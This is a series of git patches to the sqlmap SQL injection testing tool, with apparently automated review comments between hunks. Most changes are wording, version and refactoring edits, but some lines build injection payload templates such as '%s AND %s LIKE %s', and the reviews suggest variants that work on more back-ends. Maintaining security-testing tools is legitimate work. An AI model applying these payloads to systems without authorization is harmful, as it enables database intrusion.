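Review bot: The new `"Request rejected by xVarnish-WAF" in (page or "")` test is a case-sensitive substring match, whereas the three checks just above it all use `re.search(..., re.I)`; a block page that differs only in case is missed. For consistency with the rest of the function, `retval |= code >= 400 and re.search(r"Request rejected by xVarnish-WAF", page or "", re.I) is not None`. The loop and `detect` itself start outside the hunk.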
@@ -253,13 +253,13 @@ def cmdLineParser(argv=None): help="Regexp to exclude parameters from testing (e.g. \"ses\")") injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") + help="Force back-end DBMS to provided value") injection.add_option("--dbms-cred", dest="dbmsCred", help="DBMS authentication credentials (user:password)") injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system to this value") + help="Force back-end DBMS operating system to provided value") injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values") diff --git a/sqlmap.conf b/sqlmap.conf index 522e02df011..5dc78e2463b 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -241,7 +241,7 @@ skipStatic = False # Regexp to exclude parameters from testing (e.g. "ses"). paramExclude = -# Force back-end DBMS to this value. If this option is set, the back-end +# Force back-end DBMS to provided value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. # Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, @@ -256,7 +256,7 @@ dbms = # Syntax: username:password dbmsCred = -# Force back-end DBMS operating system to this value. If this option is +# Force back-end DBMS operating system to provided value. If this option is # set, the back-end DBMS identification process will be minimized as # needed. # If not set, sqlmap will detect back-end DBMS operating system diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ec7ad935e1..f2345ede3c1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -def1ed8934e08b37d5e6455554cb2be8 lib/core/settings.py +83c0f3f92dc98c530494d0bf32617d0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -58,7 +58,7 @@ c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py +ec0dae17de8c524f86bf66ffcac24093 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 091c8ab2dd7c178aa0907a989c277defee67ad4c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:37:22 +0200 Subject: [PATCH 158/428] Minor update (switching --invalid-logical to LIKE version) --- lib/controller/checks.py | 2 +- lib/core/agent.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 25ab83be194..44f1ad62704 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -433,7 +433,7 @@ def checkSqlInjection(place, parameter, value): if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) - origValue = "%s AND %s=%s" % (value, _, _ + 1) + origValue = "%s AND %s LIKE %s" % (value, _, _ + 1) elif conf.invalidBignum: origValue = kb.data.randomInt[:6] elif conf.invalidString: diff --git a/lib/core/agent.py b/lib/core/agent.py index b7bb3c4ea34..6f1380ac4b7 100644 --- a/lib/core/agent.py 
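Review bot: `"%s AND %s LIKE %s" % (value, _, _ + 1)` applies LIKE to two bare integer literals; LIKE is a string operator, and on at least PostgreSQL `12 LIKE 13` is rejected with an "operator does not exist" error rather than evaluating to false, so the "invalid" value would turn an intended false-but-valid query into an error response there (I have not verified the other supported back-ends). If an always-false but syntactically valid predicate is wanted everywhere, quoting the operands, e.g. `origValue = "%s AND '%s' LIKE '%s'" % (value, _, _ + 1)`, avoids the type problem, and a comment explaining why LIKE was preferred over `=` (the commit message only says "switching") would help. `checkSqlInjection` starts and ends outside the hunk.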
+++ b/lib/core/agent.py @@ -142,7 +142,7 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N match = re.search(r"\A[^ ]+", newValue) newValue = newValue[len(match.group() if match else ""):] _ = randomInt(2) - value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1) + value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1) elif conf.invalidBignum: value = randomInt(6) elif conf.invalidString: diff --git a/lib/core/settings.py b/lib/core/settings.py index 2bea0c6ba05..6df44889d6a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.7" +VERSION = "1.2.6.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f2345ede3c1..d74733cfdb7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,11 +22,11 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -9682b922fd621d31708d562b15803202 lib/controller/checks.py +2bfb57f063421c3789a81cd4ca89d8dc lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -b1990c7805943f0c973a853bba981d96 lib/core/agent.py +ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 240cb11db16783c6601b1d7de5eadd8d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 
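Review bot: Same concern as in lib/controller/checks.py: `"%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1)` issues LIKE between two unquoted integers, which PostgreSQL rejects with a type error instead of returning false (other back-ends not verified). The two sites now build the same predicate with the same `randomInt` idiom in separate files, so a shared helper such as `invalidLogicalPredicate(lhs, rhs)` in lib/core/common.py would keep them from drifting apart and is the natural home for the why-comment. `Agent.payload` starts and ends outside the hunk.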
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -83c0f3f92dc98c530494d0bf32617d0e lib/core/settings.py +9cfb2ab4e4be638f47abb7e8b0bb47e9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From e0c7b5c63c9ceff394bbcb2a5584c551e6337ad7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:46:54 +0200 Subject: [PATCH 159/428] Minor wording update --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 4 ++-- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6df44889d6a..a1f439d09a0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.8" +VERSION = "1.2.6.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index fb7bddd7d01..b8e843fccd3 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -400,7 +400,7 @@ def cmdLineParser(argv=None): help="Search column(s), table(s) and/or database name(s)") enumeration.add_option("--comments", dest="getComments", action="store_true", - help="Retrieve DBMS comments") + help="Check for DBMS comments during enumeration") enumeration.add_option("-D", dest="db", help="DBMS database to enumerate") 
@@ -581,7 +581,7 @@ def cmdLineParser(argv=None): help="Log all HTTP traffic into a HAR file") general.add_option("--hex", dest="hexConvert", action="store_true", - help="Use DBMS hex function(s) for data retrieval") + help="Use hex conversion during data retrieval") general.add_option("--output-dir", dest="outputDir", action="store", help="Custom output directory path") diff --git a/sqlmap.conf b/sqlmap.conf index 5dc78e2463b..f29a7be423d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -481,7 +481,7 @@ dumpAll = False # Valid: True or False search = False -# Retrieve back-end database management system comments. +# Check for database management system database comments during enumeration. # Valid: True or False getComments = False @@ -710,7 +710,7 @@ forms = False # Valid: True or False freshQueries = False -# Use DBMS hex function(s) for data retrieval. +# Use hex conversion during data retrieval. # Valid: True or False hexConvert = False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d74733cfdb7..fc9e300303c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9cfb2ab4e4be638f47abb7e8b0bb47e9 lib/core/settings.py +55f2994073c8311c14895278ee8c8e25 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 
@@ -58,7 +58,7 @@ c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -ec0dae17de8c524f86bf66ffcac24093 lib/parse/cmdline.py +dc7b8fef4125abb26869689b8921b195 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From d47c16e196d671cfc9661485a0064805e43527ed Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:55:32 +0200 Subject: [PATCH 160/428] Minor refactoring --- lib/controller/checks.py | 6 +++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 44f1ad62704..047c77a05a3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -558,14 +558,14 @@ def genCmpPayload(): logger.info(infoMsg) else: trueSet = set(extractTextTagContent(trueRawResponse)) - trueSet = trueSet.union(__ for _ in trueSet for __ in _.split()) + trueSet |= set(__ for _ in trueSet for __ in _.split()) falseSet = set(extractTextTagContent(falseRawResponse)) - falseSet = falseSet.union(__ for _ in falseSet for __ in _.split()) + falseSet |= set(__ for _ in falseSet for __ in _.split()) if threadData.lastErrorPage and threadData.lastErrorPage[1]: errorSet = set(extractTextTagContent(threadData.lastErrorPage[1])) - errorSet = errorSet.union(__ for _ in errorSet for __ in _.split()) + errorSet |= set(__ for _ in errorSet for __ in _.split()) else: errorSet = set() diff --git a/lib/core/settings.py b/lib/core/settings.py index a1f439d09a0..bbea665a0ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
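Review bot: Style: `__` as a loop variable reads like a dunder name, and after this change the identical "split each extracted string into words and union them back" step is repeated three times for `trueSet`, `falseSet` and `errorSet`. A tiny local helper, `def _words(items): return set(items) | set(w for s in items for w in s.split())`, called as `trueSet = _words(extractTextTagContent(trueRawResponse))`, removes both the duplication and the `_`/`__` names. Behavior is unchanged either way, since the right-hand `set(...)` is fully built before `|=` mutates its target. The enclosing function starts outside the hunk.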
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.9" +VERSION = "1.2.6.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fc9e300303c..a76181a480e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -2bfb57f063421c3789a81cd4ca89d8dc lib/controller/checks.py +94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -55f2994073c8311c14895278ee8c8e25 lib/core/settings.py +65f5f735ff6df29a6675106e920a1c1c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 9b397f00be33890821e3739bb2f2af1d7583ae99 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 01:28:02 +0200 Subject: [PATCH 161/428] Minor refactoring --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 5 deletions(-) 
diff --git a/lib/core/common.py b/lib/core/common.py index 8b099c10cb7..a555625cf87 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1866,8 +1866,7 @@ def getFilteredPageContent(page, onlyText=True, split=" "): # only if the page's charset has been successfully identified if isinstance(page, unicode): retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) - while retVal.find(2 * split) != -1: - retVal = retVal.replace(2 * split, split) + retVal = re.sub(r"%s{2,}" % split, split, retVal) retVal = htmlunescape(retVal.strip().strip(split)) return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index bbea665a0ca..516de7c7ed3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.10" +VERSION = "1.2.6.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a76181a480e..4d655f91b69 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -240cb11db16783c6601b1d7de5eadd8d lib/core/common.py +e722f6285239331de9a528ac662ae05e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
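Review bot: `re.sub(r"%s{2,}" % split, split, retVal)` interpolates `split` into both a regex and a replacement template unescaped, whereas the `str.replace` loop it replaces treated it as a literal: a caller passing a metacharacter such as `"."`, `"|"` or a backslash now gets a different pattern (or `re.error`), a multi-character separator has `{2,}` applied only to its last character, and backslashes in the replacement are read as group references. `retVal = re.sub(r"(?:%s){2,}" % re.escape(split), lambda _: split, retVal)` keeps the old literal semantics while remaining a single pass. `getFilteredPageContent` starts outside the hunk.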
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -65f5f735ff6df29a6675106e920a1c1c lib/core/settings.py +7912a54938f8d43bf6ad4adbd6de392c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 23777143b6f7364ebc4c9ff0bae50479ed57baf2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 10:07:12 +0200 Subject: [PATCH 162/428] Update related to the #3137 --- lib/core/settings.py | 2 +- lib/utils/api.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 516de7c7ed3..472d0ec1805 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.11" +VERSION = "1.2.6.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 52ee0f44265..cbdce996790 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py 
@@ -159,6 +159,8 @@ def engine_start(self): self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "sqlmap.py")): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN) else: self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4d655f91b69..41ded7cc88f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7912a54938f8d43bf6ad4adbd6de392c lib/core/settings.py +276640cf3fa694e3cf7e94c207ba14ef lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -99,7 +99,7 @@ f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py +3e404b091e698cceadc1b9d2f1dae4d9 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py From cf4c263a4eb3a4dd33c76814cdaeda6939d2eb72 Mon Sep 17 00:00:00 2001 
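Review bot: The added `elif` branch launches the engine as `"python"` resolved from PATH, like the branches above it, rather than as the interpreter that is running the API server, so on a host where `python` maps to another major version (or to whatever sits first in a writable PATH entry) the child runs under a different interpreter than the one the server was started with; `sys.executable` is the right first element of the argv list. The directory is also computed twice and the outer `os.path.join(...)` with a single argument is a no-op, so hoisting `directory = os.path.abspath(os.path.dirname(sys.argv[0]))` before the `elif` keeps the existence test and the `cwd=` argument in sync. `engine_start` begins before this hunk, so the earlier branches are only partly visible.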
From: Miroslav Stampar Date: Fri, 8 Jun 2018 14:45:15 +0200 Subject: [PATCH 163/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a555625cf87..f3771e19ab5 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4385,7 +4385,7 @@ def getRequestHeader(request, name): retVal = None - if request and name: + if request and request.headers and name: _ = name.upper() retVal = max(value if _ == key.upper() else None for key, value in request.header_items()) diff --git a/lib/core/settings.py b/lib/core/settings.py index 472d0ec1805..a0b7ae2e704 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.12" +VERSION = "1.2.6.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41ded7cc88f..f8047eee02b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e722f6285239331de9a528ac662ae05e lib/core/common.py +59246d63fd0f8ffa6db61ff1ba0797c8 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
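Review bot: The widened guard `if request and request.headers and name:` still feeds `max()` a generator of `value`/`None` items, which raises `ValueError` if `request.header_items()` yields nothing and relies on `None` sorting below strings (and, with duplicate headers, on lexical order) to pick the match; `next()` states the lookup directly and returns `None` on no match: `retVal = next((value for key, value in request.header_items() if key.upper() == _), None)`. Whether a truthy `request.headers` guarantees a non-empty `header_items()` is not visible from this hunk. The function's `return` lies outside the hunk.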
@@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -276640cf3fa694e3cf7e94c207ba14ef lib/core/settings.py +6f676678bbe92b0840e37eebbdd5c1e6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From b93284530e36e2096150f862ca0f455973c20dae Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 8 Jun 2018 15:13:50 +0200 Subject: [PATCH 164/428] Patch related to the #3139 --- lib/core/settings.py | 2 +- lib/request/httpshandler.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a0b7ae2e704..3ae46d1ca63 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.13" +VERSION = "1.2.6.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index cb41f5af0ff..a98bdc71b0d 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -12,6 +12,7 @@ import urllib2 from lib.core.common import getSafeExString +from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException 
@@ -48,7 +49,7 @@ def create_sock(): # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"): + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): try: sock = create_sock() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f8047eee02b..efe00f25356 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6f676678bbe92b0840e37eebbdd5c1e6 lib/core/settings.py +9962d6781b4c6d216b2982d3c2e0aa6a lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -72,7 +72,7 @@ c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py +98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py From a97fd1dedeb30cfc314a88df2b94e096a3ae4172 Mon Sep 17 00:00:00 2001 
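Review bot: The added `not any((conf.proxy, conf.tor))` switches off the SNI-capable `SSLContext` path for every proxied or Tor request, not only for the failing case behind #3139, so a target that selects its certificate by SNI and is reached through an HTTP CONNECT proxy (where the TLS handshake still terminates at the origin) may now be handed the origin's default certificate or fail the handshake; the fallback path below the hunk is not visible, so I cannot tell whether it degrades cleanly. A one-line comment stating why the proxy/Tor case is excluded would help the next reader, e.g. `# SNI path is skipped over proxy/Tor (Reference: #3139)`. `conf.proxy or conf.tor` also reads more directly than `not any((conf.proxy, conf.tor))`. `create_sock` and the enclosing `connect` continue outside the hunk.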
